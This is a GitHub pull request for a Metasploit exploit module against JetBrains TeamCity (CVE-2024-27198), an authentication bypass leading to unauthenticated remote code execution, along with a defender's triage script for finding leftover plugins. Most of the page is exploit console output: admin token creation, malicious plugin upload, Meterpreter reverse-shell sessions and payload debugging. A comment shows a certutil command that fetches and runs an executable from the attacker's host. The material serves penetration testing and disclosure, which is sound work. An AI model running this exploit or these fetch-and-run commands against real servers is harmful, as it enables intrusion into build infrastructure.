
JetBrains TeamCity Unauthenticated RCE exploit module (CVE-2024-27198) #18922

Merged
merged 29 commits into from Mar 13, 2024

Conversation

sfewer-r7
Contributor

@sfewer-r7 sfewer-r7 commented Mar 5, 2024

This module exploits an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198). An unauthenticated attacker can leverage this to access the REST API and create a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload, allowing the attacker to achieve unauthenticated RCE on the target TeamCity server. On older versions of TeamCity, access tokens do not exist, so the exploit will instead create a new administrator account before uploading a plugin. Older versions of TeamCity have a debug endpoint (/app/rest/debug/process) that allows arbitrary commands to be executed; however, recent versions of TeamCity no longer ship this endpoint, which is why a plugin is leveraged for code execution instead, as this is supported on all versions tested.

For a full technical analysis of the vulnerability, please read our AttackerKB Analysis or our disclosure blog post.

The module has been tested against:

  • TeamCity 2023.11.3 (build 147512) running on Windows Server 2022
  • TeamCity 2023.11.2 (build 147486) running on Windows Server 2022
  • TeamCity 2023.11.3 (build 147512) running on Linux
  • TeamCity 2018.2.4 (build 61678) running on Windows Server 2016

and has targets for the Java, Java Server Page, and command architectures, running on the Windows, Linux, and Unix platforms.

Example

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show options

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              8111             yes       The target port (TCP)
   SSL                false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI          /                yes       The base path to TeamCity
   TEAMCITY_ADMIN_ID  1                yes       The ID of an administrator account to authenticate as
   VHOST                               no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      cWStJXIvdtmM     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               eth0             yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.NVAxemdUTVFnSlp4Um1jdkN5Yi12dk1wNkJR.NTIyNTA1NjgtOWM3Zi00YzdiLTkzMTEtYTc2Y2ZkZjRjYTVl
[*] Uploading plugin: CyGZ1ME5
[*] Sending stage (3045380 bytes) to 192.168.86.43
[*] Deleting the plugin...
[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.43:55572) at 2024-02-23 14:24:37 +0000
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/TeamCity/work/Catalina/localhost/ROOT/TC_147512_CyGZ1ME5' on the target
[!] This exploit may require manual cleanup of '/home/teamcity/.BuildServer/system/caches/plugins.unpacked/CyGZ1ME5' on the target

meterpreter > getuid
Server username: teamcity
meterpreter > sysinfo
Computer     : 192.168.86.43
OS           : Ubuntu 22.04 (Linux 6.5.0-15-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/opt/TeamCity/bin
meterpreter > 
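
As an added example (not part of this PR or the module), here is a triage script a defender or responder could run on a TeamCity host to look for leftover plugin directories in the three locations the module's cleanup warnings name. The three base paths are taken from the output above; the 8-character alphanumeric plugin-name pattern (inferred from the sample names in the output) and the sample directory tree are assumptions.

```python
import re
import tempfile
from pathlib import Path

# Assumed from the plugin names in the page's sample output (CyGZ1ME5, Cg5BdkfJ):
# the uploaded plugin gets an 8-character alphanumeric name.
RANDOM_PLUGIN_NAME = re.compile(r"^[A-Za-z0-9]{8}$")


def candidate_dirs(install_root, data_dir, build):
    """Yield (location, plugin_name, path) for every plugin directory found in the
    three places the module's cleanup warnings point at. The three base paths are
    the ones printed in the output; everything else about the layout is assumed."""
    locations = [
        ("webapps", Path(install_root) / "webapps" / "ROOT" / "plugins"),
        ("catalina-work", Path(install_root) / "work" / "Catalina" / "localhost" / "ROOT"),
        ("unpacked-cache", Path(data_dir) / "system" / "caches" / "plugins.unpacked"),
    ]
    # The Catalina work dir entry is named TC_<build>_<plugin> in the output.
    work_prefix = f"TC_{build}_"
    for location, base in locations:
        if not base.is_dir():
            continue
        for entry in sorted(base.iterdir()):
            if not entry.is_dir():
                continue
            name = entry.name
            if location == "catalina-work":
                if not name.startswith(work_prefix):
                    continue
                name = name[len(work_prefix):]
            yield location, name, entry


def find_suspicious_plugins(install_root, data_dir, build, known_plugins=()):
    """Return plugin directories that are not on the allowlist, flagging the
    random-looking names seen in the exploit output as the strongest signal."""
    known = set(known_plugins)
    hits = []
    for location, name, path in candidate_dirs(install_root, data_dir, build):
        if name in known:
            continue
        reason = "random-looking name" if RANDOM_PLUGIN_NAME.match(name) else "not in allowlist"
        hits.append({"location": location, "plugin": name, "path": str(path), "reason": reason})
    return sorted(hits, key=lambda h: (h["plugin"], h["location"]))


def build_sample_tree():
    """Constructed sample: a throwaway directory that mirrors the cleanup paths
    from the output, with two leftover exploit plugins and one legitimate plugin."""
    root = Path(tempfile.mkdtemp(prefix="tc-triage-"))
    install = root / "opt" / "TeamCity"
    data = root / "home" / "teamcity" / ".BuildServer"
    build = "147512"
    for path in [
        install / "webapps" / "ROOT" / "plugins" / "Cg5BdkfJ",
        install / "work" / "Catalina" / "localhost" / "ROOT" / f"TC_{build}_Cg5BdkfJ",
        install / "work" / "Catalina" / "localhost" / "ROOT" / f"TC_{build}_CyGZ1ME5",
        data / "system" / "caches" / "plugins.unpacked" / "CyGZ1ME5",
        data / "system" / "caches" / "plugins.unpacked" / "my-company-plugin",
    ]:
        path.mkdir(parents=True)
    return install, data, build


if __name__ == "__main__":
    install, data, build = build_sample_tree()
    for hit in find_suspicious_plugins(install, data, build, known_plugins=["my-company-plugin"]):
        print(f"{hit['location']:15} {hit['plugin']:10} {hit['reason']:20} {hit['path']}")
```

On a real host, point install_root and data_dir at the server's install and data directories and pass the plugins you know you deployed as known_plugins.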

@sfewer-r7 sfewer-r7 changed the title JetBrains TeamCity Unauthenticated RCE exploit module (CVE-2023-27198) JetBrains TeamCity Unauthenticated RCE exploit module (CVE-2024-27198) Mar 5, 2024
@cdelafuente-r7 cdelafuente-r7 self-assigned this Mar 5, 2024
@W01fh4cker

For some doubts about CVE-2024-27198, please see https://github.com/W01fh4cker/CVE-2024-27198-RCE?tab=readme-ov-file#-problem for details.

… the plugin will block. We can still get a session if we fall through here. We can't delete the plugin as access will block because we did not spawn.
@sec13b

sec13b commented Mar 10, 2024

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*] Command to run on remote host: certutil -urlcache -f http://192.168.1.33:12012/oiB8zh7giZOuuW2r9fc7rw %TEMP%\FMjRYTscXcH.exe & start /B %TEMP%\FMjRYTscXcH.exe
[*] Fetch handler listening on 192.168.1.33:12012
[*] HTTP server started
[*] Adding resource /oiB8zh7giZOuuW2r9fc7rw
[*] Started reverse TCP handler on 192.168.1.33:11011
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 8.1.2 (build 29993) detected.
[-] Exploit aborted due to failure: unexpected-reply: Failed to create an authentication token.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) >

@sfewer-r7
Contributor Author

per @sec13b comment above:

[+] The target is vulnerable. JetBrains TeamCity 8.1.2 (build 29993) detected.
[-] Exploit aborted due to failure: unexpected-reply: Failed to create an authentication token.

The exploit is untested against 8.1.2 (released 10 years ago, circa April 2014). The earliest version I tested against is 2018.2.4. For 2018, access tokens don't exist (so the same would be true for 8.1.2), and the exploit falls back on creating a new user account before uploading the payload plugin.

Getting 8.1.2 to work could require changing https://github.com/rapid7/metasploit-framework/pull/18922/files#diff-fb3623b66a3a4669b2336323d7b92c3b1beb85ea57589f597a1fd926166d4f35R177 to detect whatever the error from 8.1.2 is when creating the access token fails.

@sfewer-r7
Contributor Author

sfewer-r7 commented Mar 11, 2024

There is an unknown problem with the Java payload against Linux (target 0). As of commit 0513654 a Java payload will work on Linux only if the Spawn advanced option is zero (set Spawn 0). The other targets (JSP and command payloads) all work fine.

The issue that is breaking Java payloads on Linux appears to be related to how Payload.java handles spawning a new Java process to run the payload.

Below we can see the payload working if Spawn is zero, but as the payload didn't spawn a new process, all access to the uploaded plugin blocks (because the payload is running in that thread), so the exploit cannot delete the payload. Also, it is non-obvious to the user to set Spawn to zero.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show options 

Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.43    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              8111             yes       The target port (TCP)
   SSL                false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI          /                yes       The base path to TeamCity
   TEAMCITY_ADMIN_ID  1                yes       The ID of an administrator account to authenticate as
   VHOST                               no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.86.42    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > show advanced

Module advanced options (exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198):

   Name                     Current Setting                                                 Required  Description
   ----                     ---------------                                                 --------  -----------
   AllowNoCleanup           false                                                           no        Allow exploitation without the possibility of cleaning up files
   AutoCheck                true                                                            no        Run check before exploit
   ContextInformationFile                                                                   no        The information file that contains context information
   DOMAIN                   WORKSTATION                                                     yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                                            no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler    false                                                           no        Disable the handler code for the selected payload
   EnableContextEncoding    false                                                           no        Use transient context when encoding payloads
   FileDropperDelay                                                                         no        Delay in seconds before attempting cleanup
   FingerprintCheck         true                                                            no        Conduct a pre-exploit fingerprint verification
   ForceExploit             false                                                           no        Override check result
   HttpClientTimeout                                                                        no        HTTP connection and receive timeout
   HttpPassword                                                                             no        The HTTP password to specify for authentication
   HttpRawHeaders                                                                           no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                                           no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                                         no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                                           no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                             no        The HTTP username to specify for authentication
   SSLServerNameIndication                                                                  no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                                            yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL2,
                                                                                                       SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent                Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/2  no        The User-Agent header to use for all requests
                            0100101 Firefox/118.0
   VERBOSE                  true                                                            no        Enable detailed status messages
   WORKSPACE                                                                                no        Specify the workspace for this module
   WfsDelay                 2                                                               no        Additional delay in seconds to wait for a session


Payload advanced options (java/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AESPassword                                   no        Password for encrypting communication
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   JavaMeterpreterDebug         false            no        Run the payload in debug mode, with logging enabled
   MeterpreterDebugBuild        false            no        Use a debug version of Meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessio
                                                           ns.html
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   Spawn                        0                yes       Number of subprocesses to spawn
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      true             no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module


View the full module info with the info, or info -d command.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit 

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.Sy04ZElUZGFMV041azlsU3FkMjNCbEU5RVBB.ZTFkMDcxZWMtMzM1Mi00NjgwLTk3ZmUtNzFhM2M5NzI3YWIw
[*] Uploading plugin: Cg5BdkfJ
[*] Sending stage (57971 bytes) to 192.168.86.43
[*] Meterpreter session 9 opened (192.168.86.42:4444 -> 192.168.86.43:41498) at 2024-03-11 12:32:07 +0000
[!] Spawn was 0, accessing the plugin will block and timeout.
[*] Target install path: /opt/TeamCity
[*] Target build number: 147512
[*] Target data directory path: /home/teamcity/.BuildServer
[*] Deleting the plugin...
[*] Enabled Plugin UUID: ce95979f-e0b6-43d2-9a47-beda085a620a
[!] Failed to disable the plugin.
[!] Failed to delete the plugin.
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/TeamCity/webapps/ROOT/plugins/Cg5BdkfJ' on the target
[!] This exploit may require manual cleanup of '/opt/TeamCity/work/Catalina/localhost/ROOT/TC_147512_Cg5BdkfJ' on the target
[!] This exploit may require manual cleanup of '/home/teamcity/.BuildServer/system/caches/plugins.unpacked/Cg5BdkfJ' on the target

meterpreter > getuid
Server username: teamcity
meterpreter > sysinfo
Computer        : sfewer-ubuntu-test
OS              : Linux 6.5.0-21-generic (amd64)
Architecture    : x64
System Language : en_IE
Meterpreter     : java/linux
meterpreter > 

If we set Spawn to the default value of 2 and run the exploit, we can see via strace on the target system that Payload.java runs correctly the first time to drop the payload to a temporary directory and calls java via execve to run it, before deleting the dropped files.

There is no evidence the dropped payload runs a second time (or a third, which would actually stage the payload). I'm testing on Ubuntu 22.04 and OpenJDK 11:

teamcity@sfewer-ubuntu-test:/opt/TeamCity/temp$ uname -a
Linux sfewer-ubuntu-test 6.5.0-21-generic #21~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb  9 13:32:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
teamcity@sfewer-ubuntu-test:/opt/TeamCity/temp$ java --version
openjdk 11.0.22 2024-01-16
OpenJDK Runtime Environment (build 11.0.22+7-post-Ubuntu-0ubuntu222.04.1)
OpenJDK 64-Bit Server VM (build 11.0.22+7-post-Ubuntu-0ubuntu222.04.1, mixed mode, sharing)

An abridged strace log is here, showing the system calls from the Tomcat java process where the payload is run the first time to drop to disk:

steve@sfewer-ubuntu-test:~$ sudo strace --trace=file,process -v -s 8192 -f -p 90420 2>&1 | grep \~spawn
[pid 156814] newfstatat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp", 0x7f80d3efc340, 0) = -1 ENOENT (No such file or directory)
[pid 156814] openat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp", O_RDWR|O_CREAT|O_EXCL, 0666) = 970
[pid 156814] unlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp") = 0
[pid 156814] newfstatat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt", 0x7f80d3efc3d0, 0) = -1 ENOENT (No such file or directory)
[pid 156814] mkdir("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt", 0777) = -1 ENOENT (No such file or directory)
[pid 156814] readlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir", 0x7f80d3ef9b10, 1023) = -1 ENOENT (No such file or directory)
[pid 156814] readlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir", 0x7f80d3ef9b10, 1023) = -1 ENOENT (No such file or directory)
[pid 156814] newfstatat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir", 0x7f80d3efc360, 0) = -1 ENOENT (No such file or directory)
[pid 156814] mkdir("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir", 0777) = 0
[pid 156814] mkdir("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt", 0777) = 0
[pid 156814] openat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt/Payload.class", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 970
[pid 156814] openat(AT_FDCWD, "/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt.dat", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 970
[pid 156817] execve("/usr/lib/jvm/java-11-openjdk-amd64/bin/java", ["/usr/lib/jvm/java-11-openjdk-amd64/bin/java", "-classpath", "/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir", "ajgqRLrFVt.Payload"], ["LESSOPEN=| /usr/bin/lesspipe %s", "TEAMCITY_SERVER_SCRIPT=/opt/TeamCity/bin/teamcity-server.sh", "MAIL=/var/mail/teamcity", "LANGUAGE=en_IE:en", "USER=teamcity", "JAVA_TOOL_OPTIONS=-XX:ErrorFile=/opt/TeamCity/temp/java.error.log", "SSH_AGENT_PID=1766", "XDG_SESSION_TYPE=x11", "SHLVL=2", "HOME=/home/teamcity", "OLDPWD=/opt/TeamCity/bin", "GNOME_SHELL_SESSION_MODE=ubuntu", "GTK_MODULES=gail:atk-bridge", "TEAMCITY_BIN_DIRECTORY=/opt/TeamCity/bin", "SYSTEMD_EXEC_PID=2465", "XRDP_PULSE_SOURCE_SOCKET=xrdp_chansrv_audio_in_socket_10", "XRDP_PULSE_SINK_SOCKET=xrdp_chansrv_audio_out_socket_10", "DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1000/bus", "CATALINA_PID=/opt/TeamCity/bin/../logs/teamcity.pid", "COLORTERM=truecolor", "PULSE_SCRIPT=/etc/xrdp/pulse/default.pa", "IM_CONFIG_PHASE=1", "TEAMCITY_SERVER_OPTS=", "GTK_IM_MODULE=ibus", "LOGNAME=teamcity", "_=./runAll.sh", "XDG_SESSION_CLASS=user", "TERM=xterm-256color", "GNOME_DESKTOP_SESSION_ID=this-is-deprecated", "JDK_JAVA_OPTIONS= --add-opens jdk.management/com.sun.management.internal=ALL-UNNAMED -XX:+IgnoreUnrecognizedVMOptions -XX:ReservedCodeCacheSize=640M --add-opens=java.base/java.lang=ALL-UNNAMED --add-opens=java.base/java.io=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED --add-opens=java.base/java.util.concurrent=ALL-UNNAMED --add-opens=java.rmi/sun.rmi.transport=ALL-UNNAMED", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin", "SESSION_MANAGER=local/sfewer-ubuntu-test:@/tmp/.ICE-unix/1849,unix/sfewer-ubuntu-test:/tmp/.ICE-unix/1849", "XDG_MENU_PREFIX=gnome-", "XRDP_SOCKET_PATH=/run/xrdp/sockdir", "GNOME_TERMINAL_SCREEN=/org/gnome/Terminal/screen/9678e090_7ada_48c0_b482_34f8afa546d4", "XDG_RUNTIME_DIR=/run/user/1000", 
"TEAMCITY_LOGS_PATH=/opt/TeamCity/bin/../logs", "DISPLAY=:10.0", "TEAMCITY_RESTART_LOCK_FILE_PATH=/opt/TeamCity/bin/../logs/teamcity.lock", "LANG=en_IE.UTF-8", "XDG_CURRENT_DESKTOP=ubuntu:GNOME", "XMODIFIERS=@im=ibus", "LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:", "GNOME_TERMINAL_SERVICE=:1.86", "SSH_AUTH_SOCK=/run/user/1000/keyring/ssh", "UID=1000", "SHELL=/bin/bash", "QT_ACCESSIBILITY=1", "LESSCLOSE=/usr/bin/lesspipe %s %s", "XRDP_SESSION=1", "GPG_AGENT_INFO=/run/user/1000/gnupg/S.gpg-agent:0:1", 
"QT_IM_MODULE=ibus", "PWD=/opt/TeamCity/bin", "JAVA_HOME=/usr/lib/jvm/default-java", "XDG_DATA_DIRS=/usr/share/gnome:/usr/local/share:/usr/share:/var/lib/snapd/desktop", "VTE_VERSION=6800", "CATALINA_OPTS=  -server -Xmx1024m -Dteamcity.configuration.path=\"../conf/teamcity-startup.properties\" -Dlog4j2.configurationFile=\"file:/opt/TeamCity/bin/../conf/teamcity-server-log4j.xml\" -Dteamcity_logs=\"/opt/TeamCity/bin/../logs\" -Djava.awt.headless=true"] <unfinished ...>
[pid 156814] unlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt/Payload.class") = 0
[pid 156814] unlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt") = -1 EISDIR (Is a directory)
[pid 156814] rmdir("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt") = 0
[pid 156814] unlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir/ajgqRLrFVt.dat") = 0
[pid 156814] unlink("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir") = -1 EISDIR (Is a directory)
[pid 156814] rmdir("/opt/TeamCity/temp/~spawn4249156839154543662.tmp.dir") = 0

The TeamCity server is run as the user teamcity and overrides the Java temporary directory location via the command line argument -Djava.io.tmpdir=/opt/TeamCity/temp in the Tomcat process. This is not passed to child processes (they get the parent's environment variables). I wonder if this is part of the problem. It could also be a permission or shared library issue.

… running the payload in a thread, and forcing the default options for Spawn to be 0
@sfewer-r7
Contributor Author

Commit 1e371d0 resolves the Java payload issue on Linux by leveraging the PayloadServlet and running the Java payload in a new thread, while setting the default option for Spawn to 0 (so it does not drop to disk). Works great on both Linux and Windows.

We can note from below that our Meterpreter is now executing in the TeamCity server process.

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit 

[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.SnkteGtaT28zcHlERldWQlVXQ1hJbmtpbklj.MWRlNGJkYzYtMzQyMy00OTBhLWI2MjctZWQ3NzcyY2MzNTBk
[*] Uploading plugin: ThFi4v02
[*] Sending stage (57971 bytes) to 192.168.86.43
[*] Target install path: /opt/TeamCity
[*] Target build number: 147512
[*] Target data directory path: /home/teamcity/.BuildServer
[*] Deleting the plugin...
[+] Deleted /opt/TeamCity/work/Catalina/localhost/ROOT/TC_147512_ThFi4v02
[+] Deleted /home/teamcity/.BuildServer/system/caches/plugins.unpacked/ThFi4v02
[*] Enabled Plugin UUID: 6ccb09cf-f5c5-4b40-bf12-df6e19f45da1
[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.43:41216) at 2024-03-11 18:01:54 +0000
[*] Disabled Plugin UUID: c6a897c8-98e1-4c8e-bc18-f71ca5c343cd
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/TeamCity/webapps/ROOT/plugins/ThFi4v02' on the target

meterpreter > getuid
Server username: teamcity
meterpreter > sysinfo
Computer        : sfewer-ubuntu-test
OS              : Linux 6.5.0-21-generic (amd64)
Architecture    : x64
System Language : en_IE
Meterpreter     : java/linux
meterpreter > getpid
Current pid: 203617
meterpreter > ps

Process List
============

 PID     Name                                                                  User      Path
 ---     ----                                                                  ----      ----
 1       /sbin/init                                                            root      /sbin/init splash
 
 ...snip...
 
 203617  /usr/lib/jvm/default-java/bin/java                                    teamcity  /usr/lib/jvm/default-java/bin/java -Djava.util.logging.config.file=/opt/TeamCity/conf/logging.properties -Djava.util.logging.manag
                                                                                         er=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webres
                                                                                         ources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -server -Xmx1024m -Dteamcity.configuration.path=../conf/teamcity
                                                                                         -startup.properties -Dlog4j2.configurationFile=file:/opt/TeamCity/bin/../conf/teamcity-server-log4j.xml -Dteamcity_logs=/opt/TeamC
                                                                                         ity/bin/../logs -Djava.awt.headless=true -Dignore.endorsed.dirs= -classpath /opt/TeamCity/bin/bootstrap.jar:/opt/TeamCity/bin/tomc
